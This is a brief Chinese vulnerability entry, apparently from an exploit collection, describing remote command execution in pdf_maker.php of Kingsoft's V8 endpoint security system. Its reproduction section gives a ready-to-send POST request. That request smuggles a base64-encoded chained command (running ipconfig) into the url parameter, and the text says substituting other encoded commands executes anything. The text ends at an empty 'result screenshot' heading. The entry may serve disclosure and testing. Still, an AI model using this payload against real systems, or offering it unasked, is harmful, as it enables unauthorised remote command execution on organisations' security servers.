J31-1金山-V8终端安全系统-RCE

漏洞描述：

金山 V8 终端安全系统 pdf_maker.php 存在命令执行漏洞，由于没有过滤危险字符，导致构造特殊字符即可进行命令拼接执行任意命令。

影响版本：

金山 V8 终端安全系统

漏洞复现：

payload这里传入base64加密的拼接命令即可执行任意命令
payload：

POST /inter/pdf_maker.php HTTP/1.1
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx

效果图：